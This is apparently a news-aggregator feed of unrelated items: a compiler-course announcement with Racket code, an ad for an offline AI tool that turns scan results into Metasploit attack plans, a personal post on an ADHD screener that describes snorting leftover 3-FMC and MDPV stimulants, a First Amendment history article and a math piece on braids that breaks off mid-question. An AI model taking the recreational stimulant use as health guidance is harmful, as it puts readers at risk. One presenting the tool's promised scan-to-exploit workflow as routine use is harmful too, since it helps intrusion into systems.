The other objection I'd expect to hear is whether this would actually end up reducing compile times in practice. This concern is much harder for me to dismiss, and it's the reason I listed my confidence in the idea as "low". Any time saved by avoiding compilation of unused code would be offset by the cost of having to determine how the features depend on each other, and there would be a tradeoff when deciding the amount of code in each of these features; having a larger number of "smaller" features would increase the amount of code that could be eliminated from compilation, but it would also increase the amount of work needed to determine which of these features depend on each other. The amount of compilation that could be avoided could vary dramatically based on what parts of the library's API are being used, and the dependency graph of features might end up being so deep that the extra work to split into smaller features wouldn't end up eliminating more code than if a smaller set of "larger" features were picked instead.

Despite not being super confident that this would end up as a net improvement in compile times, this is still the idea I'm most interested in seeing discussed. Maybe someone will make a compelling enough argument against it that I'll change my mind, and most likely the idea won't end up going anywhere regardless of what my opinion is, but there's always a small chance that I was lucky enough to come up with a useful idea, and then we can all finally enjoy the benefits of lower compile times.

Build a Compiler in Five Projects

Lobsters
kmicinski.com
2025-11-24 07:15:56
Comments...
Original Article

Class website here: https://kmicinski.com/cis531-f25

Are you interested in building a compiler? Learning how functional languages are implemented? Gaining a bit of practical experience with x86-64 assembly language? If so, I invite you to try your hand at the projects in my class, CIS531 . CIS531 is a masters-level class on compiler design which assumes that (a) you know how to program, (b) you’ve had some exposure to C (know about stack allocation, malloc, etc.), and (c) have seen some assembly code. My class projects are in the Racket programming language, but if you don’t know Racket, it is quite easy to learn: I have a set of YouTube video lectures that teach Racket quickly ! If you’ve never heard of Racket before, or you’re skeptical of functional programming, indulge me for a bit: there’s no hardcore FP theory or math in this course, and Racket is genuinely the best language to use for this specific setup.

My class follows Prof. Jeremy Siek’s excellent book, “Essentials of Compilation.” While I highly recommend buying the book and supporting Prof. Siek, I will also note that there are free online preliminary editions floating around; in my class, I followed the free version and suggested that students buy the book if doing so fit their goals. However, along with the book, I also have a set of class slides along with sporadic course videos, both available on the class website .

This class builds up to a compiler with the following features:

  • Variables and assignment via let
  • Integer arithmetic via + and -
  • Reading inputs / printing output
  • Booleans, conjunctions/disjunctions (and/or)
  • Branching via if , integer comparisons (<, etc.)
  • Heap-allocated vectors
  • Assignment / mutation ( set! )
  • While loops
  • Fixed-arity functions and function application
  • Lambdas (closures at runtime)

The unique combination of features lets us tour an interesting cross-section of programming languages, exploring imperative programming with loops and mutation as well as functional programming with lists and recursion.

The Projects

To be specific, I challenge you to complete five projects, each including a comprehensive test suite that will seriously stress the correctness of your implementation. p1 is a warmup project (you should skip it if you already know Racket), but p2-5 build a compiler for a set of increasingly complex languages to x86-64. The languages nest inside of each other, with p2 giving us straight-line arithmetic, p3 giving us decision trees, p4 giving us loops and mutation, and p5 giving us functions, recursion, and lambdas.

  1. p1 – Stack interpreter. This is a warmup project; if you know Racket and have some PL background, feel free to skip it.

  2. p2 – Straight-line arithmetic / variables → x86-64 assembly language

  3. p3 – Booleans and branching (if, and, or) → x86-64 assembly language

  4. p4 – Vectors, heap allocation, set!, and loops → x86-64 assembly language

  5. p5 – Functions, lambdas, and closure conversion → x86-64 assembly language

The projects are designed with one key principle in mind: get us to the most expressive/fun language possible, as fast as possible . In doing this, we sacrifice a lot that might be typically covered:

  • Our languages aren’t type/memory safe, we assume the programmer is correct

  • No register allocation (possible to add, not too hard)

  • No garbage collection of any kind: we just use malloc. We could trivially support the Boehm GC (I have done that in the past), but it was another static library to link in and I really wanted to make this self-contained.

  • We support a very limited set of builtins (but it is trivial to add more)

So even after project 5, getting to a “real” compiler would take a bit of effort. The most important missing pieces (in my opinion) are (a) memory safety (the language needs to be safe, period) via dynamic type tagging, (b) slightly more builtins, and (c) register allocation. That would get us to a respectable compiler. After that, we could add more language features, or optimize the ones we have, e.g., by using abstract interpretation.

An Example Program

Our language will include functions, loops, branching, assignment, and even heap-allocated vectors. As an example of its power, here's a Sudoku solver written in the language:

(program
 ;; =========================
 ;; List primitives
 ;; Empty list is (void)
 ;; =========================
 (define (is_nil x) (eq? x (void)))

 ;; cons cell as 2-element vector: [0] = head, [1] = tail
 (define (cons h t)
   (let ([c (make-vector 2)])
     (let ([_ (vector-set! c 0 h)])
       (let ([_ (vector-set! c 1 t)])
         c))))

 (define (head c) (vector-ref c 0))
 (define (tail c) (vector-ref c 1))

 ;; =========================
 ;; Cell representation
 ;; cell = (row col val) as nested cons
 ;; =========================
 (define (make_cell r c v)
   (cons r (cons c (cons v (void)))))

 (define (cell_row cell)
   (head cell))

 (define (cell_col cell)
   (head (tail cell)))

 (define (cell_val cell)
   (head (tail (tail cell))))

 ;; =========================
 ;; Block indexing (0,1,2) for rows/cols
 ;; =========================
 (define (block_index3 x)
   (if (< x 3)
       0
       (if (< x 6)
           1
           2)))

 (define (same_block? r1 c1 r2 c2)
   (if (eq? (block_index3 r1) (block_index3 r2))
       (eq? (block_index3 c1) (block_index3 c2))
       #f))

 ;; =========================
 ;; Lookup current value at (row, col) in board
 ;; board is a list of cells
 ;; Return 0 if not assigned
 ;; =========================
 (define (lookup board row col)
   (if (is_nil board)
       0
       (let ([cell (head board)])
         (let ([r (cell_row cell)])
           (let ([c (cell_col cell)])
             (if (and (eq? r row) (eq? c col))
                 (cell_val cell)
                 (lookup (tail board) row col)))))))

 ;; =========================
 ;; Conflict check:
 ;; #t if some cell in board has:
 ;;   - same value, and
 ;;   - same row OR same col OR same 3x3 block
 ;; =========================
 (define (conflicts? board row col val)
   (if (is_nil board)
       #f
       (let ([cell (head board)])
         (let ([r (cell_row cell)])
           (let ([c (cell_col cell)])
             (let ([v (cell_val cell)])
               (if (and (eq? v val)
                        (or (eq? r row)
                            (or (eq? c col)
                                (same_block? r c row col))))
                   #t
                   (conflicts? (tail board) row col val))))))))

 ;; =========================
 ;; Recursive backtracking solver over (row, col)
 ;; board: list of assignments
 ;; rows, cols = 0..8
 ;; =========================
 (define (solve_cell row col board)
   (if (eq? row 9)
       ;; All rows done: solved
       board
       (if (eq? col 9)
           ;; End of row: go to next row
           (solve_cell (+ row 1) 0 board)
           ;; Otherwise, try this cell
           (let ([existing (lookup board row col)])
             (if (eq? existing 0)
                 ;; Empty cell: try values 1..9
                 (let ([candidate 1])
                   (let ([solution (void)])
                     (begin
                       (while (and (< candidate 10)
                                   (eq? solution (void)))
                              (begin
				(if (conflicts? board row col candidate)
                                    ;; conflict, skip
                                    (set! solution solution)
                                    ;; no conflict, extend board and recurse
                                    (let ([s (solve_cell row
                                                         (+ col 1)
                                                         (cons (make_cell row col candidate)
                                                               board))])
                                      (if (eq? s (void))
                                          (set! solution solution)
                                          (set! solution s))))
				(set! candidate (+ candidate 1))))
                       solution)))
                 ;; Pre-filled cell: just move on
                 (solve_cell row (+ col 1) board))))))

 ;; =========================
 ;; Read initial board from input:
 ;; 81 integers, row-major, 0 = empty, 1..9 = given
 ;; Returns list of cells
 ;; =========================
 (define (read_board)
   (let ([board (void)])
     (let ([i 0])
       (begin
         (while (< i 9)
		(begin
                  (let ([j 0])
                    (while (< j 9)
			   (begin
			     (let ([v (read)])
                               (if (eq? v 0)
				   (set! board board)
				   (set! board (cons (make_cell i j v) board))))
			     (set! j (+ j 1)))))
                  (set! i (+ i 1))))
         board))))

 ;; =========================
 ;; Entry: read board, solve from (0,0), return solution
 ;; Solution is a list of (row col val) cells
 ;; =========================
 (let* ([board (read_board)]
        [solution (solve_cell 0 0 board)])
   (lookup solution 8 8)))

The Full Language

The final language you’ll implement will be this one. In comments, I’ve also highlighted the sublanguages: for example, project 2 includes only numbers, input (read), binary plus, unary minus, variable references and let binding. It grows to all of R5 .

(define (R5-exp? e)
  (match e
    ;; Project 2
    [(? fixnum?) #t]
    ['(read) #t]
    [`(+ ,(? R5-exp? e0) ,(? R5-exp? e1)) #t]
    [`(- ,(? R5-exp? e)) #t]
    [(? symbol?) #t]
    [`(let ([,(? symbol? x) ,(? R5-exp? e)]) ,(? R5-exp? eb)) #t]
	;; Project 3
    [#t #t]
    [#f #t]
    ['(void) #t]
    [`(- ,(? R5-exp? e0) ,(? R5-exp? e1)) #t]
    [`(and ,(? R5-exp? e0) ,(? R5-exp? e1)) #t]
    [`(or  ,(? R5-exp? e0) ,(? R5-exp? e1)) #t]
    [`(not ,(? R5-exp? e1)) #t]
    [`(,(? cmp? c) ,(? R5-exp? e0) ,(? R5-exp? e1)) #t]
    [`(if ,(? R5-exp? e-g) ,(? R5-exp? e-t) ,(? R5-exp? e-f)) #t]
    ;; Project 4
    [`(let* ([,(? symbol? xs) ,(? R5-exp? es)] ...) ,(? R5-exp? eb)) #t]
    [`(begin ,(? R5-exp?) ... ,(? R5-exp? ret)) #t]
    [`(while ,(? R5-exp? e-g) ,(? R5-exp? es) ...) #t]
    [`(make-vector ,(? R5-exp? len)) #t]
    [`(vector-ref ,(? R5-exp? v) ,(? fixnum? i)) #t]
    [`(vector-set! ,(? R5-exp? v) ,(? fixnum? i) ,(? R5-exp? e-v)) #t]
    [`(set! ,(? symbol? x) ,(? R5-exp? e)) #t]
    ;; Project 5
    [`(,(? R5-exp? e-f) ,(? R5-exp? a-args) ...) #t]
    [`(lambda (,(? symbol? xs) ...) ,(? R5-exp? e-body)) #t]
	[_ #f]))

(define (R5-defn? defn)
  (match defn
    ;; Project 5 adds multiple function definitions
    [`(define (,(? symbol? f) ,(? symbol? formals) ...)  ,(? R5-exp? e-b)) #t]
    [_ #f]))

(define (R5? p)
  (match p
    [`(program ,(? R5-defn? defns) ... ,(? R5-exp?)) #t]
    [_ #f]))
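For a sense of scale, here is a minimal example (mine, not from the course materials) that already fits inside the project 2 sublanguage above; it reads one integer and evaluates to that value minus two, using only read, let, binary plus, and unary minus:

(program
 (let ([x (read)])
   (+ x (- 2))))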

The Compiler’s Structure

To get you booted up as fast as possible, every single project is designed the same way:

  • compile.rkt – Your pass implementations. You will edit the functions provided here. This is the only file you will edit! The rest are read-only.
  • irs.rkt – IR definitions and predicates like anf-program? , c1-program? , etc. (see also typed/shrunk variants)
  • interpreters.rkt – Reference interpreters for several IRs (used by tests and for your own debugging).
  • system.rkt – System/ABI configuration, pass names, runtime filenames, output paths, etc.
  • main.rkt – Driver that runs all passes, can build a binary, and can launch a debug server.
  • test.rkt – Test harness. Runs isolation tests or end-to-end native tests depending on -m mode.
  • runtime.c – Minimal runtime ( read_int64 , print_int64 , etc.).
  • test-programs/ – Example programs ( .scm ).
  • input-files/ – Input streams for programs (lines of integers).
  • goldens/ – Instructor goldens (IR snapshots, interpreter outputs, and stdout baselines).

You write your code in compile.rkt , which consists of a set of passes . Each pass transforms an input language into an output language, and these intermediate languages (IRs) are codified via predicates in irs.rkt . To define the meaning of each IR, we give an interpreter for each in interpreters.rkt . For the compiler to be correct, it needs to be the case that–for all input streams–the compiler produces the same output stream across all intermediate IRs. There is some system-specific stuff in system.rkt , which takes care of things like Linux vs. Mac ABI issues, specifying register names, etc. The main.rkt file acts as a main compiler entrypoint, and it carefully runs each pass of the compiler, checking predicates before/after each pass and interpreting each IR, checking to ensure consistency. This is a huge win for debugging, in my opinion: you always want to localize errors to the proximate pass which causes misinterpretation, and main.rkt seriously aids debugging in my experience. There is also more comprehensive test infrastructure in test.rkt ; this test script is invoked by the Python-based test scripts in test/ . These tests check the behavior of the compiler on the programs in the test-programs/ directory, using the files from input-files as inputs and comparing to the outputs in goldens/ .

Why Is This Course Unique and Cool?

  • You build a real compiler , all the way to actual x86-64 assembly.

  • Each IR has a corresponding interpreter, which is easy to find/read and written in a familiar style, giving semantic clarity and testable correctness.

  • The project is language scalable , meaning that you can use it as a base for building your own language. Of course, this is thanks to Dr. Siek’s great “incremental” design.

  • It is fully testable across multiple passes , which helps anticipate the thing we all fear most about writing a compiler: seeing a problem that is the ramification of far-away code from higher up in the compilation pipeline.

  • It is written in a simple, pure recursive style . Just plain old pattern matching and recursion here, no need for any complex abstractions.

How Do I Get Started?

  • Familiarize yourself with the course webpage: https://kmicinski.com/cis531-f25

  • If you don’t know Racket, start with project 1: https://kmicinski.com/cis531-f25/projects/1

  • Otherwise, start with project 2: https://kmicinski.com/cis531-f25/projects/2

  • When you finish each project, move on to the next!

  • When you're done, start building your own language. Consider adding types (checking/inference), classes, more builtins, pattern matching, continuations, exceptions, or algebraic effects. The options are myriad, but once you've finished projects 2-5, you've built a whole compiler for a surprisingly expressive language.

Thank you to the National Science Foundation and Others

If you like this work and live in the United States, please feel commensurately less bad about paying your taxes. I made the whole class free, at least as free as I could given practical constraints. This class work on compilation is partially supported by our NSF PPoSS large , which has already produced many cool major results . In subsequent explorations, I am hoping that I can use this class compiler as a baseline for highly-scalable engines that reason about programs. Given the simple, self-contained nature–and the presence of per-pass interpreters and consistency testing–I see this as an awesome potential baseline for cool extensions.

My course is of course heavily inspired by Prof. Siek’s book and course, along with inspiration from Thomas Gilray at Washington State. Eight years ago, Tom and I took a spontaneous trip to see the eclipse halfway across the country (skipping out on the ICSE ‘17 deadline basically); we discussed compiler design over a steamed seafood buffet in Myrtle Beach after napping in a cheap motel, having been awake for over 24 hours and feeling the eclipse had made it worth it. We sketched out his whole compiler on that roadtrip, and ever since that night eating steamed crabs, I wanted to build my own course compiler. Now that I have, I am not sure it compares to waking up for just four hours of twilight, only to consume copious amounts of butter and shellfish as the brisk ocean air wisps over your face, the closures and continuations softly washing rhythmically through the conversation as you walk along the beach back to your $50 motel room.

In closing, thanks for checking this out; this compiler was a ton of fun to build. Even as someone who has some amount of expertise in compiler design, building it and getting it 100% right (I hope!) was such a rewarding experience. My real sincere hope is that it offers students (and you!) a fun journey. If you end up doing anything with this, please get in touch: kkmicins@syr.edu. I'd love to see what you come up with. Best wishes,

Kristopher Micinski – Syracuse, November, 2025

Show HN: Syd – An offline-first, AI-augmented workstation for blue teams

Hacker News
www.sydsec.co.uk
2025-11-24 07:11:38
Comments...
Original Article

Syd AI Assistant: Your Air-Gapped Cybersecurity Expert

Unleash the power of AI for offensive and defensive security operations, all within a secure, offline environment.

Watch Syd analyse tool output and provide instant exploitation guidance

Back Syd Now - From £50

The Syd Advantage

Uncompromising Security

In a world of cloud-based AI, Syd stands apart. Delivered on a physical 1TB SSD and updated via encrypted USB, Syd is truly air-gapped. This means zero risk of your sensitive client data, vulnerabilities, or proprietary tools ever being exposed to a third-party service.

Powered by local Dolphin Llama 3 8B model – no internet connection required

Accelerated Workflow

Turn hours of manual analysis into seconds of AI-powered insight. Syd's RAG engine searches over 356,000 cybersecurity knowledge chunks and instantly transforms raw tool output into actionable intelligence.

Automatic detection of Nmap, Volatility, YARA, PCAP, and over 20 other tools

On-Demand Expertise

Syd combines a specialised LLM with over 356,000 chunks covering Metasploit exploits, Atomic Red Team techniques, forensics workflows, CVE databases, and threat intelligence, making expert-level knowledge accessible around the clock.

2GB+ knowledge base including exploits, forensics, and incident response workflows

For Red Teams

Syd empowers you with instant access to exploit intelligence. Paste Nmap results and get ready-to-run Metasploit commands and Exploit-DB links, turning vulnerability scans into actionable attack plans in seconds.

See Offensive Capabilities

For Blue Teams & IR

Syd provides context-aware remediation steps, malware-specific workflows from YARA outputs, and deep forensic insights from Volatility findings, helping you respond to threats faster and more effectively.

See Defensive Capabilities

A True Multi-Tool Platform

Syd isn't just a single tool; it's an intelligence engine that integrates with the tools you already use.

Broad Integration

Syd integrates with a vast array of tools including Nmap, Metasploit, Sliver, Bloodhound, Crackmapexec, Impacket, Responder, Hashcat, Feroxbuster, Curl/Ncat, Payloadbuilder (Red Team); Zeek, Volatility3, YARA, PCAP Analysis, Chainsaw, Suricata, Sysmon Helper, Tshark, Raccine, Autopsy/Sleuth Kit (Blue Team); and File Triage, Wordlist Manager, Credential Safe, Artefact Viewer, Report Builder (Utilities).

See All Integrations

Context is Key

Syd knows the difference between offensive and defensive tools, providing exploit guidance for Nmap scans and remediation steps for YARA detections automatically.

Learn More

Future-Proof Architecture

With a roadmap including dedicated IOC databases and smart indexing, Syd is designed to grow alongside your team's needs and expertise.

See the Roadmap

A One-Minute ADHD Test

Hacker News
psychotechnology.substack.com
2025-11-24 07:09:28
Comments...
Original Article

There is a six-question test for ADHD that takes a minute to complete. If you score highly on it, you are likely to have ADHD and have a strong reason to talk to a psychiatrist about getting medication. It’s a low-effort way to surface a real problem for yourself — or help someone else surface it.

Here’s the story of how I found the test. If you just want the test, skip this section.

A few years ago, when I was moving from Moscow to London, I had small leftover amounts of the stimulants 3-FMC and MDPV from my student days. I'd use them for productivity during exam periods, but I never actually enjoyed them recreationally. Still, I was not going to carry sketchy chemicals across two borders, so I figured I'd experiment with recreational use.

I snorted a small line of 3-FMC and instead of having fun I finally felt clearheaded enough to stop procrastinating on writing a farewell post for my then-colleagues. I knew stimulants are a common treatment for ADHD, so a question popped into my head: do I have ADHD? Yes, stimulants help everyone focus , but the contrast was too striking to ignore.

I took a few online tests, and they did suggest ADHD. I then read more about ADHD online, and that also suggested I had it. I kept reading and reading, wanting full certainty.

An actual depiction of me trying to figure out ADHD

There was only one definitive way to find out: get a diagnosis from a psychiatrist.

I was leaving Russia in a few weeks, and Russia bans first-line ADHD medications like amphetamine and methylphenidate. So I decided to wait until I moved to London. Two months after arriving, I booked a private assessment with a psychiatrist. Shortly after, I had the 1.5-hour assessment and walked out with an ADHD diagnosis and a prescription for lisdexamfetamine, a prodrug of d-amphetamine.

One of the questionnaires they sent me before the appointment was very short. I later learned that this six-question screener is surprisingly effective.

In the test above, give yourself one point for each answer in the grey square. If you score 4 out of 6, you have a strong reason to suspect ADHD and get a proper assessment.

Just the six questions above have a sensitivity of 69% and specificity of 99.5% in the general population . This means:

  • They correctly identify two thirds of adults with ADHD and miss the other third.

  • They flag 0.5% of people without ADHD as possibly having ADHD.

If we assume 5% of people have ADHD ( this source gives 4.4%, and this gives 6%), then:

  • The test would correctly pick up 3.5% of the population as having ADHD (0.69 × 5%).

  • It would incorrectly flag about 0.5% (≈0.475%, rounding up) of the population who don’t have ADHD.

So if you score 4 out of 6, the chance you actually have ADHD is:

3.5% / (3.5% + 0.5%) = 87.5%.
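For anyone who wants the general formula, this is just Bayes' rule for the positive predictive value; plugging in the unrounded figures quoted above (69% sensitivity, 99.5% specificity, 5% prevalence) gives essentially the same answer:

$$\text{PPV} = \frac{0.69 \times 0.05}{0.69 \times 0.05 + (1 - 0.995) \times 0.95} = \frac{0.0345}{0.03925} \approx 0.88$$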

ADHD is highly treatable with meds. First-line treatments for ADHD — stimulants like amphetamine and methylphenidate — work really well. To quote a podcast on psychiatry: “Stimulants are one of the most effective meds in psychiatry” ( source ), ”Not many treatments in psychiatry have a large effect size. There’s stimulants for ADHD, ketamine for depression” ( source ).

70-90% of people with ADHD find stimulants effective and experience noticeable quality of life improvements.

And if you don’t want to take stimulants or they don’t work for you, there are non-stimulant medications, such as atomoxetine or Intuniv .

This test is an imperfect screening tool that misses a third of all true ADHD cases and incorrectly flags a small percentage of non-ADHD people. But it has an incredible signal to effort ratio — it only takes a minute to take. If you score above its threshold — you have a strong reason to seek a full assessment.

Even if you are confident you don’t have ADHD, it’d only take you a minute to test your distractible friend. The right medication could be life-changing for them — it certainly was for me.

First Amendment in Flux: When Free Speech Protections Came Up Against the Red Scare

Portside
portside.org
2025-11-24 06:56:09
First Amendment in Flux: When Free Speech Protections Came Up Against the Red Scare Ira Mon, 11/24/2025 - 01:56 ...
Original Article

Hollywood screenwriter Samuel Ornitz speaks before the House Un-American Activities Committee in Washington, D.C., on Oct. 29, 1947. | UPI/Bettmann Archive via Getty Images

As the United States faces increasing incidents of book banning and threats of governmental intervention – as seen in the temporary suspension of TV host Jimmy Kimmel – the common reflex for many who want to safeguard free expression is to turn to the First Amendment and its free speech protections.

Yet, the First Amendment has not always been potent enough to protect the right to speak. The Cold War presented one such moment in American history, when the freedom of political expression collided with paranoia over communist infiltration .

In 1947, the House Un-American Activities Committee subpoenaed 10 screenwriters and directors to testify about their union membership and alleged communist associations. Labeled the Hollywood Ten , the defiant witnesses – Alvah Bessie, Herbert Biberman, Lester Cole, Edward Dmytryk, Ring Lardner Jr., John Howard Lawson, Albert Maltz, Samuel Ornitz, Adrian Scott and Dalton Trumbo – refused to answer questions on First Amendment grounds. During his dramatic testimony, Lawson proclaimed his intent “to fight for the Bill of Rights,” which he argued the committee “was trying to destroy.”

They were all cited for contempt of Congress . Eight were sentenced to a year in federal prison, and two received six-month terms. Upon their release, they faced blacklisting in the industry . Some, like writer Dalton Trumbo, temporarily left the country .

As a researcher focused on the cultural cold war , I have examined the role the First Amendment played in the anti-communist hearings during the 1940s and ’50s.

The conviction and incarceration of the Hollywood Ten left a chilling effect on subsequent witnesses called to appear before congressional committees. It also established a period of repression historians now refer to as the Second Red Scare .

Although the freedom of speech is enshrined in the Constitution and prized by Americans, the story of the Second Red Scare shows that this freedom is even more fragile than it may now seem.

The Fifth Amendment communists

After the 1947 hearings, the term “ unfriendly ” became a label applied by the House Un-American Activities Committee and the press to the Hollywood Ten and any witnesses who refused to cooperate with the committee. These witnesses, who wanted to avoid the fate of the Hollywood Ten, began to shift away from the First Amendment as a legal strategy.

They chose instead to plead the Fifth Amendment , which grants people the right to protect themselves from self-incrimination. Many prominent artists during the 1950s, including playwright Lillian Hellman and singer and activist Paul Robeson , opted to invoke the Fifth when called before the committee and asked about their political affiliations.

The Fifth Amendment shielded hundreds of “unfriendly” witnesses from imprisonment, including artists, teachers and federal workers. However, it did not save them from job loss and blacklisting .

While they could avoid contempt citations by pleading the Fifth, they could not erase the stain of perceived guilt. This legal approach became so widespread that U.S. Sen. Joseph McCarthy , the country’s leading anti-communist crusader, disparaged these witnesses as “ Fifth Amendment Communists ” and boasted of purging their ranks from the federal government.

Three portraits of Albert Einstein taken in Princeton, N.J., in March 1953. AP Photo

From Fifth back to First

In 1953, the physicist Albert Einstein became instrumental in revitalizing the force of the First Amendment as a rhetorical and legal tactic in the congressional hearings. Having fled Germany after the Nazis came to power, Einstein took a position at Princeton in 1933 and became an important voice in American politics.

Einstein’s philosophical battle against McCarthyism began with a letter to a Brooklyn high school teacher named William Frauenglass.

In April of that year, Frauenglass was subpoenaed to appear before the Senate Internal Security Subcommittee, “ the Senate counterpart ” of the House Un-American Activities Committee, to testify about his involvement in an intercultural education seminar. After the hearing, in which Frauenglass declined to speak about his political affiliations, he risked potential termination from his position and wrote to Einstein seeking support.

In his response, Einstein urged Frauenglass and all intellectuals to enact a “ revolutionary” form of complete “noncooperation ” with the committee.

While Einstein advised noncompliance, he also acknowledged the potential risk : “Every intellectual who is called before one of the committees ought to refuse to testify, i.e., he must be prepared for jail and economic ruin, in short, for the sacrifice of his personal welfare in the interest of the cultural welfare of his country.”

Frauenglass shared his story with the press, and Einstein’s letter was published in full in The New York Times on June 12, 1953. It was also quoted in local papers around the country.

One week later, Frauenglass was fired from his job.

After learning about Einstein’s public position, McCarthy labeled the Nobel laureate “ an enemy of America .” That didn’t stop Einstein’s campaign for freedom of expression. He continued to encourage witnesses to rely on the First Amendment.

When the engineer Albert Shadowitz received a subpoena in 1953 to appear before McCarthy’s Senate Permanent Subcommittee on Investigations, to answer questions about alleged ties to the Communist Party, he traveled to Einstein’s home to seek out the physicist’s advice. After consulting with Einstein, Shadowitz opted for the First Amendment over the Fifth Amendment.

On Dec. 16, 1953, Shadowitz informed the committee that he had received counsel from Einstein. He then voiced his opposition to the hearing on the grounds of the First Amendment: “I will refuse to answer any question which invades my rights to think as I please or which violates my guarantees of free speech and association.”

He was cited for contempt in August 1954 and indicted that November, facing a potential year in prison and US$1,000 fine. As an indicator of McCarthy’s diminishing power, the charge was thrown out in July 1955 by a federal judge.

Singer Paul Robeson appears before the House Un-American Activities Committee in Washington, D.C., in 1956. Bettmann Archive/Getty Images

The triumph of dissent

Well-known public figures also began to turn away from the Fifth Amendment as a legal tactic and to draw on the First Amendment.

In August 1955, when the folk musician Pete Seeger testified before the House Un-American Activities Committee, he voiced his rejection of the Fifth Amendment defense during the hearing. Seeger asserted that he wanted to use his testimony to call into question the nature of the inquiry altogether.

Pleading the protection of the First Amendment, Seeger refused “to answer any questions” related to his “political beliefs” and instead interrogated the committee’s right to ask such questions “under such compulsion as this.”

When the playwright Arthur Miller was subpoenaed by the committee in 1956, he also refused to invoke the Fifth. Both were cited for contempt. Seeger was sentenced to a year in prison. Miller was given the option to pay a $500 fine or spend 30 days in jail.

As Seeger and Miller fought their appeals in court, McCarthy’s popularity continued to wane, and public sentiment began to shift.

Prompted by Einstein, the noncompliant witnesses in the 1950s reshaped the public discussion, refocusing the conversation on the importance of freedom of expression rather than the fears of imagined communist infiltration.

Although the First Amendment failed to keep the Hollywood Ten out of prison, it ultimately prevailed. Unlike the Hollywood Ten, both Miller and Seeger won their appeals. Miller spent no time in prison and Seeger only one day in jail. Miller’s conviction was reversed in 1958, Seeger’s in 1962. The Second Red Scare was over.

As the Second Red Scare shows, when free speech is under attack, strategic compliance may be useful for individuals. However, bold and courageous acts of dissent are critical for protecting First Amendment rights for everyone.

Jodie Childers , Assistant Professor of English, University of Virginia

This article is republished from The Conversation under a Creative Commons license. Read the original article .

The Arithmetic of Braids (2022)

Hacker News
mathcenter.oxford.emory.edu
2025-11-24 06:44:57
Comments...
Original Article

Whether in the context of hairstyles, friendship bracelets, or even parachute cords -- most will be familiar with the notion of a braid.

As can be seen in the images above, each braid starts with some number of strands which are repeatedly crossed under/over each other in some way. Note that we typically don't allow the strands of a braid to "turn back up".

We can represent the particular crossings of a braid with a braid diagram like the one shown below. Note the diagram shown describes a braid similar to (but longer than) the hair braid above.

Of course, other braids will have a different number of strands and/or a different sequence of crossings. Some may even include sequences of crossings that don't even repeat, such as the one shown below:

Taking inspiration from braids in the real world, "tugging" on the strands in one direction or another -- even when new crossings result (as long as we don't allow any one strand to pass through another) -- can lead to different representations of what is essentially the same braid. As an example, consider the following two diagrams which actually represent the same braid.

While the two braid diagrams above represent the same braid, certainly the one on the left seems "simpler" in some capacity. This raises the question: " How does one simplify a given braid diagram? " Remember this question -- we'll come back to it in a bit.

Admittedly, drawing braid diagrams like the ones previously seen -- and especially when they are not fully simplified -- can be tedious. However, there is a much easier way to represent braids!

Towards this end, observe that if we "tug" in just the right places, we can always jiggle any particular crossing a little bit to the left or right, as desired. In this way, we can arrange any braid (with a finite number of crossings, anyways) so that no two crossings happen simultaneously as we scan the braid from left to right.

As an example, consider the braid diagram involving 5 strands presented earlier, which is shown again below on the left. Numbers and vertical lines have been added to help make the positions of the crossings easier to identify.

In the diagram below on the left, multiple crossings sometimes happen simultaneously between consecutive pairs of vertical lines. For example, between the first pair of vertical lines, the strands at positions $1$ and $2$ cross (red and green) and the strands at positions $3$ and $4$ cross (blue and orange). Similarly, between the second pair of vertical lines, the strands at positions $1$ and $2$ again cross (green and red) and the strands at positions $4$ and $5$ cross (blue and black).

However, with a bit of tugging on the strands we can ensure only one crossing happens at a time as we move from left to right along the braid. Notice how in the diagram on the right the initial red/green crossing has been jiggled a bit to the left and the initial blue/orange crossing has been jiggled a bit to the right. In this way, the red/green crossing now happens first, and the blue/orange crossing now happens second.

Indeed, once things have been "jiggled" in this way, what we see happening between pairs of consecutive lines reduces down to just a few simple possibilities for $5$ strands (there would of course be more if there were more strands involved):

Importantly, if we have names for these possibilities (above we have used $a$ through $h$ -- one letter for each of the four adjacent positions at which a crossing can occur, crossed in either of the two possible ways), then we can describe the braid in question with a simple sequence of letters. So for example, using the above we might identify the braid we've been discussing with the following sequence of letters (also known as a "word"): $$aeahchchedh$$

As much as this can help reduce the tedium of describing a braid from drawing a complicated picture to just writing down a sequence of letters -- implicit in the above is an even greater revelation. Notice it suggests a natural way to combine two braids together to produce a new (longer) braid -- through concatenation !

Consider the two small braids below, which are combined by concatenating the second to the first to form a longer braid. Note, we'll use the "$*$" operator to indicate the action of concatenation:

One should note that for two braids on the same number of strands, we can always combine them in this way to get another braid (again with the same number of strands).
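In the word notation introduced earlier, concatenation is simply writing one word after the other. For instance, the eleven-letter word from before can be read as the concatenation of two shorter braids on the same five strands: $$aeahch * chedh = aeahchchedh$$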

In general, when combining two things of the same "type" (e.g., two braids on $n$ strands) via some operation (e.g., concatenation) and the result is always of the same type, we say the "things" of this type under the associated operation are closed (or equivalently, that they satisfy the property of closure with respect to that operation). To understand the word choice here, note that the combination of any two braids by concatenation will never be anything besides another braid -- a flamingo, for example. Combinations of braids must stay in the "braid universe". We can't get to the universe of flamingos if concatenating is all we can do. The flamingo universe is inaccessible -- it is "closed off" from us.

Closure will become very important to us later, but just to mention a couple of specific examples to reinforce the idea: Note that even integers are closed with respect to addition, but odd integers are not. Similarly integers are closed with respect to multiplication, but not with respect to division.

Turning attention back to braids -- note that denoting the result of concatenating braids $B_1$ and $B_2$ with $B_1 * B_2$ subtly suggests this operation of concatenation behaves in a way similar to real number multiplication. The use of an asterisk "*" after all is a frequent way to denote a product (especially in programming).

Let's think about that for a moment -- what exactly do we mean by "behaves in a way similar to real number multiplication"? The real numbers are certainly closed under multiplication, but surely we must mean more than that! As we mull over the various properties we know multiplication of real numbers enjoys -- ones we hope braids under concatenation will also enjoy -- we might find it promising to ask the following questions:

  • Is braid concatenation associative?
    Recall, this is certainly a property of real-number multiplication: $(ab)c = a(bc)$

  • Is there an identity braid?
    That is to say, is there something that functions like the real number $1$ with respect to multiplication, in that for any real number $x$, we have $x \cdot 1 = 1 \cdot x = x$? (i.e., some special value that when we multiply some other value by it (or vice-versa), that other value's "identity" is preserved)

  • Do braids have inverses?
    We certainly have multiplicative inverses for real numbers (provided they aren't zero). That is, there is a real-number $x^{-1}$ for every non-zero real number $x$ (namely $x^{-1} = 1/x$) where the products $x \cdot x^{-1}$ and $x^{-1} \cdot x$ both equal the multiplicative identity, $1$.

Let us consider each of these in turn. For convenience, for the second and third questions, we'll assume the number of strands involved is $4$, but generalizations to some other number of strands should be both natural and (hopefully) obvious.


Q: Is braid concatenation associative?

